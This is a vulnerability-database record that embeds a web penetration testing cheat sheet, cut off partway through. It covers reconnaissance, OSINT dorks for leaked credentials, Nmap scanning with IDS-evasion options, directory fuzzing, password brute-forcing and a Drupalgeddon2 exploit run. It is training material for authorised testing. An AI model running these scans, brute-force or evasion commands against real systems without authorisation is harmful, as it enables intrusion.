{"uuid": "0ff27ea8-537d-46eb-bb01-18b8ad82de11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-0800", "type": "seen", "source": "https://gist.github.com/SixthHunter/03cef581e03578d6e37a331dc3a3abad", "content": "# Web Penetration Testing Cheat Sheet\n\n## Complete Guide to Ethical Hacking &amp; Web Application Security Testing\n\n---\n\n## \ud83d\udccb Table of Contents\n- [Introduction](#introduction)\n- [Legal &amp; Ethical Considerations](#legal--ethical-considerations)\n- [Penetration Testing Methodology](#penetration-testing-methodology)\n- [Initial Setup &amp; Installation](#initial-setup--installation)\n- [Reconnaissance (Information Gathering)](#reconnaissance-information-gathering)\n- [Port &amp; Service Scanning](#port--service-scanning)\n- [Web Enumeration](#web-enumeration)\n- [Vulnerability Assessment](#vulnerability-assessment)\n- [SQL Injection (SQLi)](#sql-injection-sqli)\n- [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)\n- [Authentication Attacks](#authentication-attacks)\n- [File Inclusion Vulnerabilities](#file-inclusion-vulnerabilities)\n- [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf)\n- [Command Injection](#command-injection)\n- [API Testing](#api-testing)\n- [SSL/TLS Security](#ssltls-security)\n- [Post-Exploitation](#post-exploitation)\n- [Reporting](#reporting)\n- [Tools Reference](#tools-reference)\n- [Practice Labs &amp; Resources](#practice-labs--resources)\n- [Sample Scripts](#sample-scripts)\n\n---\n\n## Introduction\n\nWeb penetration testing is the practice of simulating cyberattacks against web applications to identify security vulnerabilities before malicious actors can exploit them. This comprehensive guide covers everything from initial reconnaissance to post-exploitation and reporting.\n\nWhether you're preparing for certifications like OSCP, CEH, or GWAPT, or you're a security professional looking to expand your skills, this cheat sheet provides practical commands, techniques, and real-world examples.\n\n---\n\n## Legal &amp; Ethical Considerations\n\n### \u26a0\ufe0f IMPORTANT LEGAL WARNING\n\n**Penetration testing without explicit written permission is ILLEGAL** in most jurisdictions:\n- **USA**: Computer Fraud and Abuse Act (CFAA)\n- **UK**: Computer Misuse Act 1990\n- **EU**: General Data Protection Regulation (GDPR) and local cybercrime laws\n- **Australia**: Cybercrime Act 2001\n\n### Requirements Before Testing:\n1. **Signed Authorization Letter** - Must specify:\n   - Target scope (IP ranges, domains, applications)\n   - Testing dates and times\n   - Allowed testing methods\n   - Emergency contact information\n   - Legal jurisdiction and liability clauses\n\n2. **Rules of Engagement Document** covering:\n   - What constitutes out-of-scope activity\n   - Data handling procedures\n   - Notification thresholds for critical findings\n   - Third-party considerations\n\n3. **Insurance &amp; Professional Indemnity** (for professional testers)\n\n### Certifications &amp; Training:\n- **OSCP** (Offensive Security) - Hands-on penetration testing\n- **OSWP** (Offensive Security Wireless Professional)\n- **OSWE** (Offensive Security Web Expert)\n- **CEH** (EC-Council) - Certified Ethical Hacker\n- **eWPT/X** (eLearnSecurity) - Web penetration tester\n- **PNPT** (TCM Security) - Practical Network Penetration Tester\n- **BSCP** (PortSwigger) - Burp Suite Certified Practitioner\n- **GWAPT** (GIAC) - Web Application Penetration Tester\n- **CISSP** (ISC\u00b2) - Security management (requires experience)\n\n---\n\n## Penetration Testing Methodology\n\n### The 8 Phases of Penetration Testing\n\n\n| Phase | Name                         | Key Activities (Detailed)                                                                                                                                                                                                                                                                                                                                                                                                                 | Deliverables                              |\n| ----- | ---------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------- |\n| **1** | **Planning**                 | \u2022 Define scope (IPs, domains, applications, APIs)\u2022 Identify in-scope / out-of-scope assets\u2022 Establish Rules of Engagement (RoE)\u2022 Obtain legal authorization &amp; NDA\u2022 Determine testing methodology (e.g., OWASP Testing Guide, PTES)\u2022 Identify stakeholders &amp; communication channels\u2022 Set testing timeline and escalation procedures\u2022 Define success criteria &amp; reporting format                                | Signed contract, scope document           |\n| **2** | **Reconnaissance**           | \u2022 Passive OSINT (WHOIS, social media, breach databases)\u2022 Identify employee emails &amp; technology stack\u2022 DNS enumeration &amp; zone transfer attempts\u2022 Subdomain discovery (bruteforce + certificate transparency logs)\u2022 Search engine reconnaissance (Google dorking)\u2022 Metadata extraction from public documents\u2022 Identify third-party integrations &amp; cloud services\u2022 Gather leaked credentials from public sources | Target profile, attack surface map        |\n| **3** | **Scanning**                 | \u2022 Network discovery (live host identification)\u2022 TCP/UDP port scanning\u2022 Service version detection &amp; banner grabbing\u2022 OS fingerprinting\u2022 SSL/TLS configuration analysis\u2022 Firewall/WAF detection\u2022 Vulnerability scanning using automated tools\u2022 Identify misconfigurations (open S3 buckets, exposed databases)                                                                                                  | Network map, open ports, services         |\n| **4** | **Enumeration**              | \u2022 Directory and file brute-forcing\u2022 API endpoint discovery\u2022 Parameter fuzzing &amp; input testing\u2022 User account enumeration (login, password reset)\u2022 SMB/LDAP enumeration\u2022 Database fingerprinting\u2022 Identify hidden functionality in JavaScript files\u2022 Review robots.txt &amp; sitemap.xml                                                                                                                            | Content inventory, potential entry points |\n| **5** | **Vulnerability Assessment** | \u2022 Automated vulnerability scanning\u2022 Manual verification of findings\u2022 CVE &amp; exploit database research\u2022 Misconfiguration analysis\u2022 Authentication &amp; authorization testing\u2022 Business logic testing\u2022 Rate limiting &amp; brute-force testing\u2022 Map vulnerabilities to CVSS scoring\u2022 Prioritize risks (Critical, High, Medium, Low)                                                                                 | Vulnerability list, risk ratings          |\n| **6** | **Exploitation**             | \u2022 Develop proof-of-concept (PoC) exploits\u2022 Exploit web vulnerabilities (SQLi, XSS, RCE, SSRF)\u2022 Password attacks (brute-force, credential stuffing)\u2022 Privilege escalation (local &amp; domain level)\u2022 Exploit known CVEs\u2022 Gain shell access (reverse shell, web shell)\u2022 Bypass WAF/IDS mechanisms\u2022 Data extraction under controlled conditions                                                                     | Exploited vulnerabilities, access gained  |\n| **7** | **Post-Exploitation**        | \u2022 Establish persistence mechanisms\u2022 Lateral movement across network\u2022 Token impersonation &amp; pass-the-hash attacks\u2022 Dump credentials &amp; password hashes\u2022 Sensitive data discovery (PII, financial data)\u2022 Privilege escalation to domain admin\u2022 Simulate data exfiltration\u2022 Log analysis &amp; detection evasion techniques\u2022 Assess business impact of compromise                                                 | Compromised systems, sensitive data       |\n| **8** | **Reporting**                | \u2022 Document technical findings with evidence (screenshots, logs)\u2022 Risk severity classification &amp; impact analysis\u2022 Business risk explanation for executives\u2022 Remediation &amp; mitigation recommendations\u2022 Re-test verification (if required)\u2022 Executive summary (non-technical)\u2022 Technical appendix with reproduction steps\u2022 Final presentation to stakeholders                                                    | Final report, presentation                |\n\n\n\n### Testing Types:\n- **Black Box**: No prior knowledge of the system\n- **White Box**: Full access to source code, architecture, credentials\n- **Grey Box**: Partial knowledge (e.g., authenticated access)\n- **Blind Testing**: Tester knows target, target doesn't know tester\n- **Double-Blind**: Neither side knows about the test\n- **Red Team**: Full-scope adversarial simulation\n- **Purple Team**: Collaborative testing with defensive teams\n\n---\n\n## Initial Setup &amp; Installation\n\n### Installing Kali Linux\n\n**Option 1: Virtual Machine (Recommended)**\n```bash\n# Download Kali Linux VM from official site\n# Import into VirtualBox/VMware\n# Default credentials: kali:kali\n```\n\n**Option 2: Bare Metal**\n```bash\n# Download ISO from kali.org\n# Create bootable USB: dd if=kali.iso of=/dev/sdb bs=4M status=progress\n# Boot and install\n```\n\n**Option 3: Docker**\n```bash\ndocker pull kalilinux/kali-rolling\ndocker run -it kalilinux/kali-rolling /bin/bash\n```\n\n**Option 4: Windows Subsystem for Linux (WSL2)**\n```bash\n# Install WSL2, then:\nwsl --install -d kali-linux\n```\n\n### Essential Tools Installation\n\n```bash\n# Update package lists\nsudo apt update &amp;&amp; sudo apt upgrade -y\n\n# Core scanning tools\nsudo apt install -y nmap nikto gobuster dirb wfuzz\n\n# Web application tools\nsudo apt install -y sqlmap burpsuite zaproxy\n\n# Brute force tools\nsudo apt install -y hydra medusa john hashcat\n\n# Enumeration tools\nsudo apt install -y ffuf wfuzz whatweb wafw00f\n\n# Reconnaissance tools\nsudo apt install -y sublist3r amass theharvester dnsrecon\n\n# Exploitation framework\nsudo apt install -y metasploit-framework\n\n# Networking tools\nsudo apt install -y netcat-openbsd socat wireshark tcpdump\n\n# Post-exploitation\nsudo apt install -y impacket-scripts pwncat\n\n# Wordlists\nsudo apt install -y seclists wordlists\n```\n\n### Python Tools Installation\n```bash\n# Install pip if not present\nsudo apt install -y python3-pip\n\n# Python-based tools\npip3 install theHarvester dalfox xsstrike\npip3 install impacket pwncat-cs\npip3 install dnspython requests beautifulsoup4\npip3 install shodan censys\npip3 install argon2 python-nmap\n```\n\n### Directory Structure Setup\n```bash\n# Create organized workspace\nmkdir -p ~/pentest/{tools,wordlists,scripts,reports,loot}\n\n# Create target-specific directories\nmkdir -p ~/pentest/$(date +%Y%m%d)_target/{recon,scans,exploit,evidence}\ncd ~/pentest/$(date +%Y%m%d)_target\n```\n\n### Environment Variables\n```bash\n# Add to ~/.bashrc for persistence\nexport TARGET=\"10.10.10.1\"\nexport DOMAIN=\"target.com\"\nexport LHOST=$(ip a | grep tun0 | awk '{print $2}' | cut -d/ -f1)\nexport WORDLIST=\"/usr/share/wordlists/rockyou.txt\"\n\n# Source the file\nsource ~/.bashrc\n```\n\n### Burp Suite Configuration\n1. **Proxy Setup**:\n   - Browser \u2192 Settings \u2192 Network \u2192 Manual proxy: `127.0.0.1:8080`\n   - Install Burp CA certificate\n   - Firefox: Preferences \u2192 Privacy &amp; Security \u2192 Certificates \u2192 Import\n\n2. **FoxyProxy** browser extension for quick proxy switching\n\n3. **Scope Configuration**:\n   - Target tab \u2192 Scope \u2192 Add to scope\n   - Exclude out-of-scope items\n\n### /etc/hosts Configuration\n```bash\n# Add target domains for easier access\nsudo tee -a /etc/hosts &lt;&lt; EOF\n10.10.10.1    target.htb dev.target.htb admin.target.htb\n10.10.10.2    mail.target.htb vpn.target.htb\nEOF\n```\n\n---\n\n## Reconnaissance (Information Gathering)\n\n### DNS Enumeration\n\n#### Basic DNS Queries\n```bash\n# WHOIS information\nwhois target.com\n\n# All DNS records\ndig target.com ANY +noall +answer\nnslookup -type=ANY target.com\n\n# MX records (mail servers)\ndig target.com MX +short\nnslookup -type=MX target.com\n\n# NS records (name servers)\ndig target.com NS +short\nhost -t ns target.com\n\n# TXT records (SPF, DKIM, verification)\ndig target.com TXT +short\nnslookup -type=TXT target.com\n\n# A/AAAA records\ndig target.com A +short\ndig target.com AAAA +short\n\n# CNAME records\ndig www.target.com CNAME +short\n\n# SOA record (start of authority)\ndig target.com SOA +short\n```\n\n#### Zone Transfer Attempt\n```bash\n# Attempt zone transfer from each name server\nfor ns in $(dig NS target.com +short); do\n    echo \"Attempting zone transfer from $ns\"\n    dig AXFR target.com @$ns\ndone\n\n# Using host command\nhost -l target.com ns1.target.com\n```\n\n#### Reverse DNS Lookup\n```bash\n# Find domains hosted on IP\ndig -x 192.168.1.1 +short\nnslookup 192.168.1.1\n```\n\n### Subdomain Enumeration\n\n#### Passive Techniques (No direct interaction)\n```bash\n# Sublist3r - Multiple sources\nsublist3r -d target.com -o subdomains.txt\nsublist3r -d target.com -b google,yahoo,bing,baidu -t 50\n\n# Amass - Passive mode\namass enum -passive -d target.com -o amass_passive.txt\n\n# TheHarvester - Search engines\ntheHarvester -d target.com -b all -f theharvester.html\n\n# Certificate Transparency (crt.sh)\ncurl -s \"https://crt.sh/?q=%.target.com&amp;output=json\" | jq .\n\n# Using SecurityTrails API\ncurl -s \"https://api.securitytrails.com/v1/domain/target.com/subdomains\" \\\n     -H \"APIKEY: YOUR_API_KEY\" | jq -r '.subdomains[]'\n\n# Shodan\nshodan search hostname:target.com\n```\n\n#### Active Techniques\n```bash\n# Amass - Active enumeration\namass enum -active -d target.com -o amass_active.txt\namass enum -active -d target.com -brute -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n\n# Gobuster DNS mode\ngobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 50\n\n# ffuf for vhost discovery\nffuf -u http://target.com -H \"Host: FUZZ.target.com\" \\\n     -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\\n     -fc 400,404,403\n\n# DNSRecon\ndnsrecon -d target.com -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t brt\n\n# DNSEnum\ndnsenum target.com\n```\n\n### Technology Stack Identification\n\n```bash\n# WhatWeb - Comprehensive\nwhatweb target.com\nwhatweb target.com --aggression 3 --log-brief=whatweb.txt\n\n# Wappalyzer (browser extension)\n\n# BuiltWith (online service)\n\n# Wafw00f - WAF detection\nwafw00f target.com\nwafw00f target.com -a  # aggressive\n\n# HTTP headers inspection\ncurl -sI https://target.com\ncurl -sI https://target.com | grep -i \"server\\|x-powered-by\\|via\"\n\n# Web server fingerprinting\nhttpx -u target.com -tech-detect -status-code -title -follow-redirects\n\n# CMS detection\n# WordPress\nwpscan --url target.com --api-token YOUR_TOKEN\n\n# Joomla\njoomscan -u target.com\n\n# Drupal\ndroopescan scan drupal -u target.com\n```\n\n### OSINT (Open Source Intelligence)\n\n#### Email Discovery\n```bash\n# theHarvester\ntheHarvester -d target.com -b all -f results.html\ntheHarvester -d target.com -b google,bing,linkedin\n\n# Hunter.io (API required)\ncurl -s \"https://api.hunter.io/v2/domain-search?domain=target.com&amp;api_key=KEY\" | jq\n\n# EmailHarvester\npython3 EmailHarvester.py -d target.com\n```\n\n#### Social Media\n- LinkedIn: Search for employees, job postings, technologies used\n- Twitter: Company handles, employee mentions\n- GitHub: Search for company repos, code leaks, API keys\n- Glassdoor: Employee reviews, technologies mentioned\n\n#### Code Repositories\n```bash\n# GitHub dorks\nsite:github.com \"target.com\"\nsite:github.com \"target.com\" \"api_key\"\nsite:github.com \"target.com\" \"password\"\n\n# Gitrob (requires GitHub token)\ngitrob -target target.com\n\n# TruffleHog - find secrets\ntrufflehog github --org=target-org\n```\n\n#### Wayback Machine\n```bash\n# View historical versions\nwaybackurls target.com | tee wayback_urls.txt\n\n# Extract endpoints\ngau target.com | tee gau_urls.txt\n```\n\n#### Google Dorking\n```\n# Common dorks\nsite:target.com\nsite:target.com filetype:pdf\nsite:target.com inurl:admin\nsite:target.com intitle:\"index of\"\nsite:target.com ext:php | ext:asp | ext:aspx | ext:jsp\nsite:target.com inurl:wp-content\nsite:target.com \"confidential\" | \"internal use only\"\nsite:target.com intext:\"sql syntax near\" | intext:\"syntax error has occurred\" | intext:\"incorrect syntax near\"\nsite:target.com inurl:php? id=\nsite:target.com \"powered by\" | \"built with\"\n```\n\n### Cloud &amp; Infrastructure Discovery\n\n```bash\n# Find cloud assets\n# AWS\ncurl -s http://target.com.s3.amazonaws.com\ncurl -s http://s3.amazonaws.com/target.com\n\n# Azure\ncurl -s http://target.com.blob.core.windows.net\n\n# Google Cloud\ncurl -s http://storage.googleapis.com/target.com\n\n# Shodan queries\nshodan search \"hostname:target.com\" --fields ip_str,port,org,hostnames\nshodan search \"ssl:target.com\" --fields ip_str,port\nshodan search \"http.title:target\" --fields ip_str,port\n\n# Censys\ncensys search \"target.com\"\n```\n\n---\n\n## Port &amp; Service Scanning\n\n### Nmap Fundamentals\n\n#### Basic Scans\n```bash\n# Quick scan (top 1000 ports)\nnmap -T4 -F target.com\n\n# Version detection\nnmap -sV target.com\n\n# OS detection\nnmap -O target.com\n\n# Default scripts\nnmap -sC target.com\n\n# Combined: version + scripts\nnmap -sV -sC target.com\n\n# Aggressive scan (OS + version + scripts + traceroute)\nnmap -A -T4 target.com\n```\n\n#### Port Selection\n```bash\n# Specific ports\nnmap -p 80,443,8080,8443 target.com\n\n# Port range\nnmap -p 1-1000 target.com\n\n# All ports (65535) - slow\nnmap -p- target.com\n\n# Fast all ports (with rate limiting)\nnmap -p- --min-rate 5000 target.com\n\n# Most common ports\nnmap --top-ports 200 target.com\n```\n\n#### Scan Types\n```bash\n# TCP SYN scan (default, requires root)\nsudo nmap -sS target.com\n\n# TCP Connect scan (no root)\nnmap -sT target.com\n\n# UDP scan\nsudo nmap -sU target.com\nsudo nmap -sU --top-ports 50 target.com\n\n# FIN scan (bypass some firewalls)\nsudo nmap -sF target.com\n\n# NULL scan\nsudo nmap -sN target.com\n\n# Xmas scan\nsudo nmap -sX target.com\n\n# ACK scan (map firewall rules)\nsudo nmap -sA target.com\n\n# Window scan\nsudo nmap -sW target.com\n\n# Maimon scan\nsudo nmap -sM target.com\n```\n\n#### Output Formats\n```bash\n# Normal output\nnmap -oN scan.txt target.com\n\n# XML output (for tools)\nnmap -oX scan.xml target.com\n\n# Grepable output\nnmap -oG scan.gnmap target.com\n\n# All formats\nnmap -oA scan target.com\n```\n\n### Advanced Nmap Techniques\n\n#### Timing and Performance\n```bash\n# Timing templates\n# T0 = Paranoid, T1 = Sneaky, T2 = Polite, T3 = Normal, T4 = Aggressive, T5 = Insane\nnmap -T4 target.com\n\n# Host timeout\nnmap --host-timeout 30m target.com\n\n# Max retries\nnmap --max-retries 3 target.com\n\n# Min/max rate\nnmap --min-rate 100 --max-rate 500 target.com\n\n# Parallelism\nnmap --min-hostgroup 50 --max-hostgroup 100 target.com\n```\n\n#### Firewall/IDS Evasion\n```bash\n# Fragment packets\nsudo nmap -f target.com\n\n# Specify MTU (must be multiple of 8)\nsudo nmap --mtu 16 target.com\n\n# Decoy scans\nsudo nmap -D RND:10 target.com\nsudo nmap -D decoy1,decoy2,ME target.com\n\n# Spoof source port\nsudo nmap --source-port 53 target.com\n\n# Randomize hosts\nsudo nmap --randomize-hosts target.com\n\n# MAC address spoofing\nsudo nmap --spoof-mac Apple target.com\nsudo nmap --spoof-mac 00:11:22:33:44:55 target.com\n\n# Idle scan (zombie)\nsudo nmap -sI zombie_host target.com\n```\n\n#### Script Scanning\n```bash\n# Run all safe scripts\nnmap -sV --script safe target.com\n\n# Run vulnerability scripts\nnmap -sV --script vuln target.com\n\n# Run exploit scripts\nnmap --script exploit target.com\n\n# Run specific category\nnmap --script default,auth,discovery target.com\n\n# Run specific script\nnmap --script http-enum target.com\nnmap --script http-title target.com\nnmap --script dns-brute target.com\n\n# Script with arguments\nnmap --script http-brute --script-args userdb=users.txt,passdb=pass.txt target.com\n\n# HTTP enumeration\nnmap -p 80,443,8080,8443 --script http-enum,http-headers,http-title,http-server-header target.com\n\n# SMB enumeration\nnmap -p 445 --script smb-enum-shares,smb-enum-users,smb-os-discovery target.com\n```\n\n### Nmap Scripting Engine Examples\n\n```bash\n# HTTP vuln scanning\nnmap -p 80,443 --script http-vuln-* target.com\n\n# SQL injection detection\nnmap -p 80 --script http-sql-injection target.com\n\n# XSS detection\nnmap -p 80 --script http-unsafe-output-escaping target.com\n\n# Shellshock detection\nnmap -p 80 --script http-shellshock target.com\n\n# Heartbleed detection\nnmap -p 443 --script ssl-heartbleed target.com\n\n# DNS zone transfer\nnmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=target.com target.com\n\n# SSL/TLS enumeration\nnmap -p 443 --script ssl-enum-ciphers target.com\nnmap -p 443 --script ssl-cert target.com\n\n# FTP enumeration\nnmap -p 21 --script ftp-anon,ftp-brute,ftp-syst target.com\n\n# SSH enumeration\nnmap -p 22 --script ssh2-enum-algos,ssh-hostkey,ssh-auth-methods target.com\n```\n\n### Practical Nmap Workflow\n\n```bash\n#!/bin/bash\n# Complete Nmap scanning workflow\n\nTARGET=\"10.10.10.1\"\nOUTDIR=\"./nmap_scan_$(date +%Y%m%d_%H%M%S)\"\nmkdir -p $OUTDIR\n\necho \"[*] Starting Nmap scan against $TARGET\"\necho \"[*] Output directory: $OUTDIR\"\n\n# Phase 1: Quick port scan\necho \"[*] Phase 1: Quick top-1000 port scan\"\nnmap -T4 --open -oN $OUTDIR/quick.txt $TARGET\n\n# Phase 2: Full port scan (all ports)\necho \"[*] Phase 2: Full port scan (all 65535)\"\nnmap -p- -T4 --min-rate 5000 -oN $OUTDIR/allports.txt $TARGET\n\n# Extract open ports\nPORTS=$(grep ^[0-9] $OUTDIR/allports.txt | cut -d'/' -f1 | tr '\\n' ',' | sed 's/,$//')\necho \"[+] Open ports: $PORTS\"\n\n# Phase 3: Service and version detection\necho \"[*] Phase 3: Service and version detection\"\nnmap -p $PORTS -sV -sC -A -oN $OUTDIR/services.txt -oX $OUTDIR/services.xml $TARGET\n\n# Phase 4: Vulnerability scan\necho \"[*] Phase 4: Vulnerability scan with NSE\"\nnmap -p $PORTS --script vuln -oN $OUTDIR/vuln.txt $TARGET\n\n# Phase 5: Safe script scan\necho \"[*] Phase 5: Safe script scan\"\nnmap -p $PORTS --script safe -oN $OUTDIR/safe_scripts.txt $TARGET\n\n# Phase 6: UDP scan (top 100 ports)\necho \"[*] Phase 6: UDP scan (top 100 ports)\"\nsudo nmap -sU --top-ports 100 -oN $OUTDIR/udp.txt $TARGET\n\necho \"[+] Scan complete! Results in $OUTDIR\"\n```\n\n---\n\n## Web Enumeration\n\n### Directory &amp; File Brute Forcing\n\n#### Gobuster\n```bash\n# Directory enumeration\ngobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50\n\n# With extensions\ngobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -x php,asp,aspx,jsp,html,txt,bak,zip,sql\n\n# Status codes\ngobuster dir -u https://target.com -w wordlist.txt -s 200,204,301,302,307,403\n\n# Exclude status codes\ngobuster dir -u https://target.com -w wordlist.txt -b 404,403\n\n# Follow redirects\ngobuster dir -u https://target.com -w wordlist.txt -r\n\n# Cookies and headers\ngobuster dir -u https://target.com -w wordlist.txt -c \"session=abc123\"\ngobuster dir -u https://target.com -w wordlist.txt -H \"Authorization: Bearer token\"\n\n# DNS subdomain enumeration\ngobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50\n\n# VHost enumeration\ngobuster vhost -u https://target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50\n```\n\n#### FFUF (Faster Fuzzer)\n```bash\n# Basic directory fuzzing\nffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt\n\n# With extensions\nffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .php,.asp,.aspx,.jsp,.html,.txt\n\n# Filter by status codes\nffuf -u https://target.com/FUZZ -w wordlist.txt -fc 404,403\nffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,204,301,302\n\n# Filter by response size\nffuf -u https://target.com/FUZZ -w wordlist.txt -fs 0\nffuf -u https://target.com/FUZZ -w wordlist.txt -fw 0\nffuf -u https://target.com/FUZZ -w wordlist.txt -fl 0\n\n# Recursive scanning\nffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2\n\n# POST request fuzzing\nffuf -u https://target.com/login -X POST -d \"username=FUZZ&amp;password=test\" -H \"Content-Type: application/x-www-form-urlencoded\" -w usernames.txt -fc 401\n\n# Header fuzzing\nffuf -u https://target.com -H \"Host: FUZZ.target.com\" -w subdomains.txt -fc 400,404\n\n# Parameter fuzzing\nffuf -u https://target.com/page?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fc 404\n\n# Cookie fuzzing\nffuf -u https://target.com -b \"session=FUZZ\" -w wordlist.txt -fc 302\n\n# Multiple FUZZ points\nffuf -u https://target.com/FUZZ1?param=FUZZ2 -w FUZZ1:dirs.txt -w FUZZ2:params.txt\n```\n\n#### Dirb\n```bash\n# Basic scan\ndirb https://target.com\n\n# With custom wordlist\ndirb https://target.com /usr/share/wordlists/dirb/big.txt\n\n# With extensions\ndirb https://target.com -X .php,.html,.txt\n\n# Non-recursive\ndirb https://target.com -r\n\n# Use cookies\ndirb https://target.com -c \"session=abc123\"\n\n# Use proxy\ndirb https://target.com -p 127.0.0.1:8080\n```\n\n#### Wfuzz\n```bash\n# Directory scanning\nwfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 https://target.com/FUZZ\n\n# File extensions\nwfuzz -c -z file,wordlist.txt -z list,php-asp-jsp https://target.com/FUZZ.FUZ2Z\n\n# POST parameter fuzzing\nwfuzz -c -z file,usernames.txt -d \"username=FUZZ&amp;password=test\" https://target.com/login\n\n# Cookie fuzzing\nwfuzz -c -z file,sessions.txt -b \"session=FUZZ\" https://target.com/dashboard\n\n# Header injection\nwfuzz -c -z file,headers.txt -H \"FUZZ: test\" https://target.com\n```\n\n### Web Server Vulnerability Scanning\n\n#### Nikto\n```bash\n# Basic scan\nnikto -h https://target.com\n\n# Specific port\nnikto -h https://target.com -p 8443\n\n# With authentication\nnikto -h https://target.com -id admin:password\n\n# SSL/TLS specific\nnikto -h https://target.com -ssl\n\n# Save output\nnikto -h https://target.com -o nikto_scan.txt\n\n# Tuning (select specific tests)\nnikto -h https://target.com -Tuning 123456\n# 1=File Upload, 2=Misconfig, 3=Info Disclosure, 4=Injection, 5=RFI/LFI, 6=XSS, 7=Command Exec, 8=SQLi, 9=SQL Injection\n\n# Use proxy\nnikto -h https://target.com -useproxy http://127.0.0.1:8080\n\n# Evasion techniques\nnikto -h https://target.com -evasion 123\n# 1=Random URI, 2=Directory prepend, 3=Prepend long random string, 4=Parameter/Value, 5=Tab separation, 6=Change case, 7=Windows paths\n```\n\n#### WhatWeb\n```bash\n# Basic detection\nwhatweb https://target.com\n\n# Aggressive mode\nwhatweb https://target.com -a 3\n\n# Verbose output\nwhatweb https://target.com -v\n\n# Log output\nwhatweb https://target.com --log-brief=whatweb.txt\nwhatweb https://target.com --log-json=whatweb.json\nwhatweb https://target.com --log-sql=whatweb.sql\n\n# Multiple targets\nwhatweb --input-file=targets.txt\n```\n\n#### WPScan (WordPress)\n```bash\n# Basic scan\nwpscan --url https://target.com\n\n# Enumerate plugins\nwpscan --url https://target.com --enumerate p\n\n# Enumerate themes\nwpscan --url https://target.com --enumerate t\n\n# Enumerate users\nwpscan --url https://target.com --enumerate u\n\n# Enumerate vulnerable plugins/themes\nwpscan --url https://target.com --enumerate vp,vt\n\n# API token for vulnerability database\nwpscan --url https://target.com --api-token YOUR_TOKEN\n\n# Password brute force\nwpscan --url https://target.com --passwords rockyou.txt --usernames admin\n\n# WAF detection\nwpscan --url https://target.com --detection-mode aggressive\n\n# Multisite scan\nwpscan --url https://target.com --multisite\n```\n\n### CMS-Specific Enumeration\n\n#### Joomla\n```bash\n# Joomscan\njoomscan -u https://target.com\n\n# Joomla vulnerability scanner\npython3 joomla-brute.py -u https://target.com -w passwords.txt -usr admin\n```\n\n#### Drupal\n```bash\n# Droopescan\ndroopescan scan drupal -u https://target.com\n\n# Drupalgeddon2\npython3 drupalgeddon2.py -u https://target.com\n```\n\n#### Magento\n```bash\n# MageScan\npython2 magento-scan.py -u https://target.com\n```\n\n### Virtual Host Discovery\n\n```bash\n# Using ffuf\nffuf -u http://target.com -H \"Host: FUZZ.target.com\" -w subdomains.txt -fs 1234\n\n# Using gobuster\ngobuster vhost -u http://target.com -w subdomains.txt\n\n# Using wfuzz\nwfuzz -c -z file,subdomains.txt -H \"Host: FUZZ.target.com\" -u http://target.com -hc 400,404\n\n# Manual with curl\nfor sub in $(cat subdomains.txt); do\n    curl -s -H \"Host: $sub.target.com\" http://target.com | grep -q \"Welcome\" &amp;&amp; echo \"Found: $sub\"\ndone\n```\n\n### API Endpoint Discovery\n\n```bash\n# Common API paths\nffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt\n\n# API version fuzzing\nffuf -u https://target.com/api/vFUZZ -w \"1-10\" -fc 404\n\n# Swagger/OpenAPI discovery\nffuf -u https://target.com/FUZZ -w &lt;(echo -e \"swagger.json\\nswagger.yaml\\nopenapi.json\\napi-docs\")\n\n# GraphQL discovery\nffuf -u https://target.com/FUZZ -w &lt;(echo -e \"graphql\\ngraphiql\\ngraphql/console\\ngraphql/graphiql\")\n```\n\n### Robots.txt and Sitemap Analysis\n\n```bash\n# Check robots.txt\ncurl -s https://target.com/robots.txt\n\n# Check sitemap\ncurl -s https://target.com/sitemap.xml\ncurl -s https://target.com/sitemap_index.xml\n\n# Extract disallowed paths\ncurl -s https://target.com/robots.txt | grep \"Disallow\" | awk '{print $2}'\n\n# Extract sitemap URLs\ncurl -s https://target.com/sitemap.xml | grep -o \"[^&lt;]*\" | sed 's///g'\n```\n\n### JavaScript File Analysis\n\n```bash\n# Download all JS files\nwget -r -l1 -A.js https://target.com\n\n# Extract endpoints from JS\ncat *.js | grep -Eo \"https?://[^/\\\\\\\"']+\" | sort -u\ncat *.js | grep -Eo \"/[a-zA-Z0-9_\\-/]+\\.(php|asp|aspx|jsp)\" | sort -u\n\n# LinkFinder\npython3 LinkFinder.py -i https://target.com -o cli\n\n# JSParser (for async endpoints)\npython2 JSParser.py https://target.com\n\n# SecretFinder\npython3 SecretFinder.py -i https://target.com -o cli\n```\n\n### Wayback Machine URL Extraction\n\n```bash\n# Get all historical URLs\nwaybackurls target.com | tee wayback_urls.txt\n\n# Gau (Get All URLs)\ngau target.com | tee gau_urls.txt\n\n# Filter interesting endpoints\ncat wayback_urls.txt | grep -E \"\\.php|\\?|\\.asp|\\.aspx|\\.jsp|api|admin|login\"\n\n# Check for parameters\ncat wayback_urls.txt | grep \"=\" | sort -u\n```\n\n---\n\n## Vulnerability Assessment\n\n### Automated Scanners\n\n#### Nuclei\n```bash\n# Basic scan\nnuclei -u https://target.com\n\n# With templates\nnuclei -u https://target.com -t cves/\nnuclei -u https://target.com -t exposures/\nnuclei -u https://target.com -t misconfiguration/\n\n# Severity-based\nnuclei -u https://target.com -severity 